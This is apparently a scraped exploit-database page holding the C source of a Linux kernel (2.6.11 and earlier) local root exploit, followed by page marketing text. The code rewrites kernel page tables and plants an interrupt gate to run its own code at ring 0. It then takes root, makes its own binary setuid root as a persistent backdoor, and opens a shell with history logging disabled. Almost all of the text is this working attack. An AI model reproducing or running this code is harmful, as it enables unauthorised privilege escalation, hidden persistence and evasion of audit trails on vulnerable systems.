	buf[(pagenr)&nbsp;*&nbsp;1024+1]&nbsp;=&nbsp;0;	
	fixint((void&nbsp;*)buf);
	return&nbsp;kwrite(base,&nbsp;(void&nbsp;*)buf,&nbsp;pagenr&nbsp;*&nbsp;4096&nbsp;+&nbsp;4);
}

/*&nbsp;make&nbsp;pme&nbsp;user&nbsp;can&nbsp;rw&nbsp;*/
static&nbsp;int&nbsp;
map_pme(unsigned&nbsp;base,&nbsp;int&nbsp;pagenr,&nbsp;unsigned&nbsp;addr)
{
	unsigned&nbsp;*buf&nbsp;=&nbsp;alloca(pagenr&nbsp;*&nbsp;4096&nbsp;+&nbsp;32);
	buf[(pagenr)&nbsp;*&nbsp;1024]&nbsp;=&nbsp;MKPMD(addr);
	buf[(pagenr)&nbsp;*&nbsp;1024+1]&nbsp;=&nbsp;0;	
	buf[(pagenr)&nbsp;*&nbsp;1024+2]&nbsp;=&nbsp;MKPMD(addr)|0x00200000;
	buf[(pagenr)&nbsp;*&nbsp;1024+3]&nbsp;=&nbsp;0;	
	fixint((void&nbsp;*)buf);
	return&nbsp;kwrite(base,&nbsp;(void&nbsp;*)buf,&nbsp;pagenr&nbsp;*&nbsp;4096&nbsp;+&nbsp;4*3);
}


static&nbsp;void&nbsp;
error(int&nbsp;d)
{
	printf(KRADM&nbsp;&quot;y3r&nbsp;422&nbsp;12&nbsp;n07&nbsp;3r337&nbsp;3nuPh!\n&quot;&nbsp;KRAD&nbsp;&quot;Try&nbsp;increase&nbsp;nrpages?\n&quot;);
	exit(1);
}

&nbsp;	char&nbsp;*bashargv[]&nbsp;=&nbsp;{&nbsp;KRADPS1,&nbsp;NULL&nbsp;};
	char&nbsp;*bashenvp[]&nbsp;=&nbsp;{&nbsp;	&quot;TERM=linux&quot;,&nbsp;&quot;PS1=[\\u@&quot;KRADPS1&quot;&nbsp;\\W]\\$&nbsp;&quot;,&nbsp;&quot;BASH_HISTORY=/dev/null&quot;,
					&quot;HISTORY=/dev/null&quot;,&nbsp;&quot;history=/dev/null&quot;,&quot;HISTFILE=/dev/null&quot;,
					&quot;PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin&quot;,&nbsp;NULL&nbsp;};

static&nbsp;int&nbsp;
exploit(unsigned&nbsp;kernelbase,&nbsp;int&nbsp;npages)
{
	struct&nbsp;idt&nbsp;*idt;
	struct&nbsp;idtr&nbsp;idtr;



	signal(SIGSEGV,&nbsp;error);
	signal(SIGBUS,&nbsp;error);


	/*&nbsp;get&nbsp;idt&nbsp;descriptor&nbsp;addr&nbsp;*/
	asm&nbsp;(&quot;sidt&nbsp;%0&quot;&nbsp;:&nbsp;&quot;=m&quot;&nbsp;(idtr));
	/*
	&nbsp;&nbsp;*&nbsp;if&nbsp;OS&nbsp;in&nbsp;vmware&nbsp;,&nbsp;idtr.base&nbsp;is&nbsp;not&nbsp;right,please&nbsp;fix&nbsp;it
	&nbsp;&nbsp;*&nbsp;[alert7@MagicLinux&nbsp;~]$&nbsp;cat&nbsp;/boot/System.map|grep&nbsp;idt_table
	&nbsp;&nbsp;*&nbsp;c0461000&nbsp;D&nbsp;idt_table
	&nbsp;&nbsp;*&nbsp;//idtr.base&nbsp;=&nbsp;0xc0461000;
	&nbsp;&nbsp;*/
	
	printf(&quot;[+]&nbsp;idtr.base&nbsp;%p&nbsp;,base&nbsp;%p\n&quot;,(void&nbsp;*)idtr.base&nbsp;,&nbsp;(void&nbsp;*)kernelbase);
	
	if&nbsp;(&nbsp;!definePAE&nbsp;)
	{
		map_pte(kernelbase,&nbsp;npages,&nbsp;idtr.base&nbsp;-&nbsp;kernelbase);
		//	idt&nbsp;=&nbsp;pae?(void&nbsp;*)MAP_PAE:(void&nbsp;*)MAP;		
		idt&nbsp;=&nbsp;(struct&nbsp;idt&nbsp;*)MAP;
	}else
	{
		/*&nbsp;TODO:&nbsp;pse&nbsp;disable&nbsp;case&nbsp;*/
		if&nbsp;(&nbsp;!havepse)
			printf(&quot;[!Waring!]&nbsp;TODO:CONFIG_X86_PAE&nbsp;define&nbsp;,but&nbsp;cpu&nbsp;flag&nbsp;no&nbsp;pse\n&quot;);
		
		map_pme(kernelbase,&nbsp;npages,&nbsp;idtr.base&nbsp;-&nbsp;kernelbase);
		idt&nbsp;=&nbsp;(struct&nbsp;idt&nbsp;*)&nbsp;idtr.base;
	}

#if&nbsp;0
	int&nbsp;*&nbsp;p&nbsp;=&nbsp;(int&nbsp;*)&nbsp;idt;
	int&nbsp;i;
	for&nbsp;(i=0;i&lt;1024;i++,p++)
		printf(&nbsp;&quot;*&nbsp;%p&nbsp;0x%x\n&quot;,p,*p);
	fflush(stdout);
#endif

	/**
	&nbsp;&nbsp;*&nbsp;cleanup&nbsp;the&nbsp;stuff&nbsp;to&nbsp;prevent&nbsp;others&nbsp;spotting&nbsp;the&nbsp;gate&nbsp;
	&nbsp;&nbsp;*&nbsp;-&nbsp;must&nbsp;be&nbsp;done&nbsp;from&nbsp;ring&nbsp;0&nbsp;
	&nbsp;&nbsp;*/
	clear1&nbsp;=&nbsp;(void&nbsp;*)&nbsp;&amp;idt[0x7f];
	printf(&quot;[+]&nbsp;idt[0x7f]&nbsp;addr&nbsp;%p\n&quot;,clear1);

	if&nbsp;(&nbsp;exploitway&nbsp;==&nbsp;0)
	{
		SET_IDT_GATE(idt[0x7f],&nbsp;3,&nbsp;idt[0x80].sel,&nbsp;((unsigned&nbsp;long)&nbsp;&amp;kcode));
	}
	else&nbsp;
	{
		SET_IDT_GATE(idt[0x7f],&nbsp;3,&nbsp;idt[0x80].sel,&nbsp;((unsigned&nbsp;long)&nbsp;&amp;stub));
	}
	
	//[2]&nbsp;SET_IDT_GATE(idt[0x7f],&nbsp;3,&nbsp;idt[0x80].sel,&nbsp;((unsigned&nbsp;long)&nbsp;&amp;stub));
	/**
	&nbsp;&nbsp;*&nbsp;also&nbsp;can&nbsp;use&nbsp;[2]&nbsp;stub&nbsp;function,but&nbsp;it&nbsp;may&nbsp;cause&nbsp;this&nbsp;message
	&nbsp;&nbsp;*
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;Debug:&nbsp;sleeping&nbsp;function&nbsp;called&nbsp;from&nbsp;invalid&nbsp;context&nbsp;at&nbsp;include/asm/uaccess.h:531
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;in_atomic():0[expected:&nbsp;0],&nbsp;irqs_disabled():1
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;&nbsp;[&lt;c011ca30&gt;]&nbsp;__might_sleep+0x7d/0x89
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;&nbsp;[&lt;c01270bd&gt;]&nbsp;sys_capget+0x1d5/0x216
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;&nbsp;[&lt;c0301bfb&gt;]&nbsp;syscall_call+0x7/0xb
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;&nbsp;[&lt;c017007b&gt;]&nbsp;pipe_writev+0x24/0x320
	&nbsp;&nbsp;*	Sep&nbsp;11&nbsp;13:11:59&nbsp;AD4&nbsp;kernel:&nbsp;&nbsp;[&lt;c01619a4&gt;]&nbsp;filp_close+0x59/0x5f
	&nbsp;&nbsp;*
	&nbsp;&nbsp;*/

	/*&nbsp;call&nbsp;raise_cap&nbsp;or&nbsp;kernel&nbsp;*/
	asm&nbsp;(&quot;int&nbsp;$0x7f&quot;);
	printf(KRADP&nbsp;&quot;j00&nbsp;1u(k7&nbsp;k1d!\n&quot;);
	setresuid(0,&nbsp;0,&nbsp;0);
	setresgid(0,&nbsp;0,&nbsp;0);
	char&nbsp;cmdbuf[1024];
	snprintf(cmdbuf,1024,&quot;chown&nbsp;root&nbsp;%s;chmod&nbsp;+s&nbsp;%s&quot;,progargv0,progargv0);
	system(cmdbuf);
	
	execve(&quot;/bin/sh&quot;,&nbsp;bashargv,&nbsp;bashenvp);
	exit(0);
}



static&nbsp;void&nbsp;
usage(char&nbsp;*n)
{
		
	printf(&quot;\nUsage:&nbsp;%s\n&quot;,n);
	printf(&quot;\t-s&nbsp;forced&nbsp;cpu&nbsp;flag&nbsp;pse&nbsp;\n&quot;);
	printf(&quot;\t-a&nbsp;define&nbsp;CONFIG_X86_PAE,default&nbsp;none\n&quot;);
	printf(&quot;\t-e&nbsp;&lt;num&gt;&nbsp;have&nbsp;two&nbsp;kernel&nbsp;code,default&nbsp;0\n&quot;);
	printf(&quot;\t-p&nbsp;&lt;num&gt;&nbsp;alloc&nbsp;pages(4k)&nbsp;,default&nbsp;1.&nbsp;Increase&nbsp;from&nbsp;1&nbsp;to&nbsp;7\n&quot;
		&nbsp;&quot;\t\tThe&nbsp;higher&nbsp;number&nbsp;the&nbsp;more&nbsp;likely&nbsp;it&nbsp;will&nbsp;crash\n&quot;);
	printf(&quot;\t-t&nbsp;&lt;num&gt;&nbsp;default&nbsp;0&nbsp;\n&quot;
		&nbsp;&nbsp;&quot;\t\t0&nbsp;:THREAD_SIZE&nbsp;is&nbsp;4096;otherwise&nbsp;THREAD_SIZE&nbsp;is&nbsp;8192\n&quot;);
	printf(&quot;\n&quot;);
	_exit(1);
}


/*read&nbsp;/proc/cpuinfo&nbsp;to&nbsp;set&nbsp;&nbsp;havepse*/
static&nbsp;void&nbsp;
read_proc(void)
{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FILE&nbsp;*&nbsp;fp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char&nbsp;*&nbsp;line&nbsp;=&nbsp;NULL;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;size_t&nbsp;len&nbsp;=&nbsp;0;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ssize_t&nbsp;read;
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;[+]&nbsp;try&nbsp;open&nbsp;/proc/cpuinfo&nbsp;..&quot;);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fp&nbsp;=&nbsp;fopen(&quot;/proc/cpuinfo&quot;,&nbsp;&quot;r&quot;);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(fp&nbsp;==&nbsp;NULL)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;&nbsp;failed!!\n&quot;);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;&nbsp;ok!!\n&quot;);	
		&nbsp;
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int&nbsp;cpus&nbsp;=&nbsp;0;	
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int&nbsp;pse&nbsp;=&nbsp;0;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((read&nbsp;=&nbsp;getline(&amp;line,&nbsp;&amp;len,&nbsp;fp))&nbsp;!=&nbsp;-1)&nbsp;
		{

		&nbsp;&nbsp;&nbsp;if&nbsp;(strstr(line,&quot;flags&quot;))
		&nbsp;&nbsp;&nbsp;{
			if(strstr(line&nbsp;,&quot;pse&nbsp;&quot;))
			{
				pse&nbsp;++;
			}
		&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fclose(fp);
		&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(line)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;free(line);
			
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;pse&nbsp;)
		{
				printf(&quot;[+]&nbsp;find&nbsp;cpu&nbsp;flag&nbsp;pse&nbsp;in&nbsp;/proc/cpuinfo\n&quot;);
				havepse&nbsp;=&nbsp;1;
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;	}

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;;

}

static&nbsp;void&nbsp;
get_config(int&nbsp;ac,&nbsp;char&nbsp;**av)
{
	
	uid&nbsp;=&nbsp;getuid();
	progargv0&nbsp;=&nbsp;av[0];

	int&nbsp;r;
	
	while(ac)&nbsp;{
		r&nbsp;=&nbsp;getopt(ac,&nbsp;av,&nbsp;&quot;e:p:t:ash&quot;);
		
		if(r&lt;0)&nbsp;break;

		switch(r)&nbsp;{

			case&nbsp;'s'&nbsp;:
			//pse
				havepse&nbsp;=&nbsp;1;
				break;

			case&nbsp;'a'&nbsp;:
			//define&nbsp;CONFIG_X86_PAE
				definePAE&nbsp;=&nbsp;1;
				break;

			case&nbsp;'e'&nbsp;:
				exploitway&nbsp;=&nbsp;atoi(optarg);
				if(exploitway&lt;0)&nbsp;fatal(&quot;bad&nbsp;exploitway&nbsp;value&quot;);
				break;

			case&nbsp;'p'&nbsp;:
				npages&nbsp;=&nbsp;atoi(optarg);
				break;
			case&nbsp;'t'&nbsp;:
				thread_size&nbsp;=&nbsp;atoi(optarg);
				
				break;				
				
			case&nbsp;'h'&nbsp;:
			default:
				usage(av[0]);
				break;
		}
	}	

	THREAD_SIZE_MASK&nbsp;=&nbsp;(thread_size==0)?(-4096):(-8192);

	read_proc();
}

static&nbsp;void&nbsp;
print_config(unsigned&nbsp;long&nbsp;kernebase)
{
	printf(&quot;[+]&nbsp;CONFIG_X86_PAE&nbsp;:%s\n&quot;,	definePAE&nbsp;	?&quot;ok&quot;:&quot;none&quot;);
	printf(&quot;[+]&nbsp;Cpu&nbsp;flag:&nbsp;pse&nbsp;%s\n&quot;,			havepse		?&quot;ok&quot;:&quot;none&quot;);	
	printf(&quot;[+]&nbsp;Exploit&nbsp;Way&nbsp;:&nbsp;%d\n&quot;,		exploitway);
	printf(&quot;[+]&nbsp;Use&nbsp;%d&nbsp;pages&nbsp;(one&nbsp;page&nbsp;is&nbsp;4K&nbsp;),rewrite&nbsp;0x%lx--(0x%lx&nbsp;+&nbsp;n)\n&quot;,
			npages,kernebase,kernebase+npages*4&nbsp;kB);
	printf(&quot;[+]&nbsp;thread_size&nbsp;%d&nbsp;(0&nbsp;:THREAD_SIZE&nbsp;is&nbsp;4096;otherwise&nbsp;THREAD_SIZE&nbsp;is&nbsp;8192&nbsp;\n&quot;,thread_size);
	fflush(stdout);
}


void&nbsp;prepare(void)
{
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(geteuid()&nbsp;==&nbsp;0)&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;{
	&nbsp;setresuid(0,&nbsp;0,&nbsp;0);
	&nbsp;setresgid(0,&nbsp;0,&nbsp;0);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;execve(&quot;/bin/sh&quot;,&nbsp;bashargv,&nbsp;bashenvp);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fatal(&quot;[-]&nbsp;Unable&nbsp;to&nbsp;spawn&nbsp;shell&quot;);
&nbsp;&nbsp;&nbsp;&nbsp;}
}

int
main(int&nbsp;argc,&nbsp;char&nbsp;**argv)
{
	char&nbsp;eater[65536];
	unsigned&nbsp;long&nbsp;kernelbase;

	/*&nbsp;unlink(argv[0]);&nbsp;*/
	//&nbsp;sync();
	
	printf(KRS&nbsp;&quot;&nbsp;&quot;KRADPS1&quot;&nbsp;-&nbsp;&lt;=linux&nbsp;2.6.11&nbsp;CPL&nbsp;0&nbsp;kernel&nbsp;exploit&nbsp;&quot;&nbsp;KRE&nbsp;&quot;\n&quot;
		KRS&nbsp;&quot;Discovered&nbsp;Jan&nbsp;2005&nbsp;by&nbsp;sd&nbsp;&lt;[email protected]&gt;&quot;&nbsp;KRE&nbsp;&quot;\n&quot;
		KRS&nbsp;&quot;Modified&nbsp;2005/9&nbsp;by&nbsp;alert7&nbsp;&lt;[email protected]&gt;&quot;&nbsp;KRE&nbsp;&quot;\n&quot;);

	if&nbsp;(&nbsp;(unsigned&nbsp;long)eater&nbsp;&gt;&nbsp;0xc0000000)
	{
		printf(&quot;[!Waring!]&nbsp;TODO:use&nbsp;stack&nbsp;&gt;&nbsp;0xc0000000&nbsp;\n&quot;);
		return&nbsp;0;
	}
	
	prepare();
	
	get_config(argc,argv);

	kernelbase&nbsp;=(unsigned&nbsp;long)eater&nbsp;;
	kernelbase&nbsp;+=0x0fffffff;
	kernelbase&nbsp;&amp;=0xf0000000;
	
	print_config(kernelbase);

	exploit(kernelbase,&nbsp;npages&lt;0?-npages:npages);

	return&nbsp;0;

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1
linux kernellocal exploitcpl 0kernel exploitsecurity teamcpu flagxfocusmagiclinux
39